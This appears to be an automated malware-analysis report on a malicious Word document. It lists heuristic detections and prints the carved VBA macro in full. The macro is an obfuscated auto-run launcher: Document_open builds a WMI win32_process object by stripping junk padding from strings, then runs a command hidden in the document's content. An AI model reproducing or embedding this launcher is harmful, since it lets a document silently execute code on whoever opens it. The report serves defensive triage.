MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.Valyria-10034158-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10034158-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set N0jfgbdcexmfr = VBA.GetObject(Whsg9jxi_om) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8473 bytes |
SHA-256: 2b8afd212b0a2ad26a917e5368163e3c32e5256aa102f773d94d8a58600b403d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
92 of 154 identifiers look randomly generated (e.g. 'Prp0rgc35w3gkhpk3u'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Ynzysnuyyfihfq23d"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Oxx2xwfkfk7ikbf9w
End Sub
Attribute VB_Name = "Pc1nzntniqj_dur51"
Attribute VB_Name = "Jlzk8qsqcshl6jk"
Function Oxx2xwfkfk7ikbf9w()
GoTo aRiqA
Const BjxaCGJ As String = "A"
Const xolsDFAoA As String = ","
Const Ikdha As String = "*high*,*critic*"
Dim ihJfBp As Range: Set ihJfBp = Array((BjxaCGJ), Target)
If ihJfBp Is Nothing Then
End If
Dim URsHL() As String: URsHL = Split(Ikdha, xolsDFAoA)
aRiqA:
skuwd = Z3neypc4_6hl3z + Ynzysnuyyfihfq23d _
. _
Content + Q955il2wdzr2d8fc1a
GoTo qckhE
Const szAVCX As String = "A"
Const ZDFvjGA As String = ","
Const wefyBED As String = "*high*,*critic*"
Dim YqzDYkkZ As Range: Set YqzDYkkZ = Array((szAVCX), Target)
If YqzDYkkZ Is Nothing Then
End If
Dim LPhmsCuzH() As String: LPhmsCuzH = Split(wefyBED, ZDFvjGA)
qckhE:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
T0lomy3trzjqt6zc = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
GoTo BcOIJEb
Const IzaGEVCD As String = "A"
Const frXBRIAUC As String = ","
Const liXWDHf As String = "*high*,*critic*"
Dim BBKJHBtF As Range: Set BBKJHBtF = Array((IzaGEVCD), Target)
If BBKJHBtF Is Nothing Then
End If
Dim vXKNhR() As String: vXKNhR = Split(liXWDHf, frXBRIAUC)
BcOIJEb:
T0_pq5at6a81jt230i = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
GoTo NjfVZEH
Const cujVJONG As String = "A"
Const zrdcAzBue As String = ","
Const FwnlEcJ As String = "*high*,*critic*"
Dim MemVBBC As Range: Set MemVBBC = Array((cujVJONG), Target)
If MemVBBC Is Nothing Then
End If
Dim XCCUFUDF() As String: XCCUFUDF = Split(FwnlEcJ, zrdcAzBue)
NjfVZEH:
T2kyo942hf2v = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
GoTo dDVvDFyJ
Const KTwdM As String = "A"
Const kOGmA As String = ","
Const bvWlGF As String = "*high*,*critic*"
Dim CivKlI As Range: Set CivKlI = Array((KTwdM), Target)
If CivKlI Is Nothing Then
End If
Dim BJuiHE() As String: BJuiHE = Split(bvWlGF, kOGmA)
dDVvDFyJ:
X8gbzx64bs3 = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
GoTo OMnbClgE
Const NABiUJmBA As String = "A"
Const TTSSDBE As String = ","
Const zWNhsCZ As String = "*high*,*critic*"
Dim hpBCIH As Range: Set hpBCIH = Array((NABiUJmBA), Target)
If hpBCIH Is Nothing Then
End If
Dim tkDRHFKIL() As String: tkDRHFKIL = Split(zWNhsCZ, TTSSDBE)
OMnbClgE:
Cr4f505hg7vldsf0c = T2kyo942hf2v + X8gbzx64bs3 + T0_pq5at6a81jt230i + mjbBYHhbs + T0lomy3trzjqt6zc
GoTo LIJNuGn
Const yoxbGFcFG As String = "A"
Const EBzng As String = ","
Const WnGZXISGD As String = "*high*,*critic*"
Dim TtymyqHC As Range: Set TtymyqHC = Array((yoxbGFcFG), Target)
If TtymyqHC Is Nothing Then
End If
Dim kzJQDGJE() As String: kzJQDGJE = Split(WnGZXISGD, EBzng)
LIJNuGn:
Whsg9jxi_om = Prp0rgc35w3gkhpk3u(Cr4f505hg7vldsf0c)
GoTo IfwvovBbI
Const nUCpSBGl As String = "A"
Const dGHeiB As String = ","
Const DfLwCIJs As String = "*high*,*critic*"
Dim wPwsfD As Range: Set wPwsfD = Array((nUCpSBGl), Target)
If wPwsfD Is Nothing Then
End If
Dim GwCvEyD() As String: GwCvEyD = Split(DfLwCIJs, dGHeiB)
IfwvovBbI:
Set N0jfgbdcexmfr = VBA.GetObject(Whsg9jxi_om)
GoTo mgbUQB
Const ODzQPrd As String = "A"
Const gHvzZ As String = ","
Const gzqiCG As String = "*high*,*critic*"
Dim kqPZDRGh As Range: Set kqPZDRGh = Array((ODzQPrd), Target)
If kqPZDRGh Is Nothing Then
End If
Dim eFJdCEIGJ() As String: eFJdCEIGJ = Split(gzqiCG, gHvzZ)
mgbUQB:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = Prp0rgc35w3gkhpk3u(mxkikw)
GoTo SdmZKHA
Const JoWtI As String = "A"
Const RzBkG As String = ","
Const RoGdiLo As String = "*high*,*critic*"
Dim WTESfHHbE As Range: Set WTESfHHbE = Array((JoWtI), Target)
If WTESfHHbE Is Nothing Then
End If
Dim AsczD() As String: AsczD = Split(RoGdiLo, RzBkG)
SdmZKHA:
N0jfgbdcexmfr.Create pqwm, Nbpclsvfxustc, I85a5jzr195h
GoTo woXMHFAWj
Const tTYAKI As String = "A"
Const NPikOxWEE As String = ","
Const wGGXPWXvH As String = "*high*,*critic*"
Dim eBdxEG As Range: Set eBdxEG = Array((tTYAKI), Target)
If eBdxEG Is Nothing Then
End If
Dim GpgYnI() As String: GpgYnI = Split(wGGXPWXvH, NPikOxWEE)
woXMHFAWj:
End Function
Function Prp0rgc35w3gkhpk3u(Zdvjtoaydjbgx6nno)
On Error Resume Next
GoTo mQJJC
Const RCizEteb As String = "A"
Const fcMsqBqHS As String = ","
Const eiWFHgJI As String = "*high*,*critic*"
Dim HiXlCAMl As Range: Set HiXlCAMl = Array((RCizEteb), Target)
If HiXlCAMl Is Nothing Then
End If
Dim HKGPhf() As String: HKGPhf = Split(eiWFHgJI, fcMsqBqHS)
mQJJC:
S4z44a_rm07 = Zdvjtoaydjbgx6nno
GoTo qabazEA
Const TWtrFHKBF As String = "A"
Const UFSXB As String = ","
Const SwIwjFCGt As String = "*high*,*critic*"
Dim tfUFkPBI As Range: Set tfUFkPBI = Array((TWtrFHKBF), Target)
If tfUFkPBI Is Nothing Then
End If
Dim GwBkDZG() As String: GwBkDZG = Split(SwIwjFCGt, UFSXB)
qabazEA:
Zo3kx9wgfsdgp2v = Bsmpx01xdp1btsbzx(S4z44a_rm07)
GoTo IAZNKNFF
Const QhLjEC As String = "A"
Const TmaaI As String = ","
Const QTrqHnpVB As String = "*high*,*critic*"
Dim MFOcG As Range: Set MFOcG = Array((QhLjEC), Target)
If MFOcG Is Nothing Then
End If
Dim tllnMEB() As String: tllnMEB = Split(QTrqHnpVB, TmaaI)
IAZNKNFF:
Prp0rgc35w3gkhpk3u = Zo3kx9wgfsdgp2v
GoTo dxujxGCSH
Const GvzsBP As String = "A"
Const VkIrTt As String = ","
Const OhlNFI As String = "*high*,*critic*"
Dim wxhyXoc As Range: Set wxhyXoc = Array((GvzsBP), Target)
If wxhyXoc Is Nothing Then
End If
Dim JHxtqF() As String: JHxtqF = Split(OhlNFI, VkIrTt)
dxujxGCSH:
End Function
Function Bsmpx01xdp1btsbzx(Oe3lz2kgadv0)
GoTo tFQrUF
Const FQbNABABD As String = "A"
Const bhdApJCs As String = ","
Const wrBNJ As String = "*high*,*critic*"
Dim VCOQBBJME As Range: Set VCOQBBJME = Array((FQbNABABD), Target)
If VCOQBBJME Is Nothing Then
End If
Dim AndgBCK() As String: AndgBCK = Split(wrBNJ, bhdApJCs)
tFQrUF:
GoTo YeFGHHg
Const YoONRCDR As String = "A"
Const NRCfdB As String = ","
Const BkXdJC As String = "*high*,*critic*"
Dim xhvKHu As Range: Set xhvKHu = Array((YoONRCDR), Target)
If xhvKHu Is Nothing Then
End If
Dim zaPgDlYE() As String: zaPgDlYE = Split(BkXdJC, NRCfdB)
YeFGHHg:
GoTo VGJvOIo
Const IcMvJH As String = "A"
Const nMrFDxBZ As String = ","
Const DOTbEvAC As String = "*high*,*critic*"
Dim DWDXCYzB As Range: Set DWDXCYzB = Array((IcMvJH), Target)
If DWDXCYzB Is Nothing Then
End If
Dim gFPNA() As String: gFPNA = Split(DOTbEvAC, nMrFDxBZ)
VGJvOIo:
Bsmpx01xdp1btsbzx = Replace(Oe3lz2kgadv0, "ns w" + "u db nd", Kef0mya01bb)
GoTo HJbpE
Const jvKCCCN As String = "A"
Const mpLEDLwAI As String = ","
Const ymBRCJA As String = "*high*,*critic*"
Dim lJxIKkhCA As Range: Set lJxIKkhCA = Array((jvKCCCN), Target)
If lJxIKkhCA Is Nothing Then
End If
Dim UNxmoIDW() As String: UNxmoIDW = Split(ymBRCJA, mpLEDLwAI)
HJbpE:
GoTo AEmiPt
Const nXOBD As String = "A"
Const PCZMFnb As String = ","
Const aspdJ As String = "*high*,*critic*"
Dim kYSmGCjDH As Range: Set kYSmGCjDH = Array((nXOBD), Target)
If kYSmGCjDH Is Nothing Then
End If
Dim xqRcJHJC() As String: xqRcJHJC = Split(aspdJ, PCZMFnb)
AEmiPt:
GoTo uPBZMu
Const RPnSaCJu As String = "A"
Const UdmGIddWE As String = ","
Const kvSXRJ As String = "*high*,*critic*"
Dim UByHC As Range: Set UByHC = Array((RPnSaCJu), Target)
If UByHC Is Nothing Then
End If
Dim LIhSwfESI() As String: LIhSwfESI = Split(kvSXRJ, UdmGIddWE)
uPBZMu:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.